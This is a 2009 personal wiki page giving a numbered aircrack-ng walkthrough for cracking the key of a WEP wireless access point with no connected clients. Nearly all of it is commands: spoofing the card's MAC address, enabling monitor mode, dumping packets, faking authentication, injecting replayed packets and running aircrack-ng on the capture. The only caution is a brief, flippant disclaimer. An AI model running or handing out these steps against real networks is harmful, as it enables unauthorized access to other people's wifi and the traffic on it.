Cracking a clientless wep AP

From D3xt3r01.tk
Revision as of 13:46, 11 October 2009 by Admin (talk | contribs) (→‎STUFF)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Jump to navigationJump to search

WHY

Not all AP's have a client connected ...I'll assume you already have a supported card and the injection is working !!! I'll also assume that you know what you're doing and you're not doing anything illegal ! DON'T GO CRACKING NEIGHBOURs wifi...

HOW

1) stop the card 

 airmon-ng stop wlan0
 ifconfig wlan0 down

2) change card mac 

 ifconfig wlan0 hw ether 00:11:22:33:44:55 up

3) get some access points 

 iwlist wlan0 scan

4) start it in monitor mode 

 airmon-ng start wlan0

5) start dumping packets 

 airodump-ng -c channel -w file --bssid ap_mac wlan0

6) fake auth 

 aireplay-ng -1 0 -a ap_mac -h 00:11:22:33:44:55 wlan0

7) play some fake packets ( you should see the packets grow fast in the airodump-ng window ) 

 aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b ap_mac -h 00:11:22:33:44:55 wlan0

8) crack it !!! 

 aircrack-ng file-01.cap

STUFF

If something's wrong .. you're probably not auth'ed .. or the injection doesn't work .. or you're too far away .. bla bla bla.. Not my problem.

LINKS

Homepage

Retrieved from "https://wiki.d3xt3r01.tk//index.php?title=Cracking_a_clientless_wep_AP&oldid=215"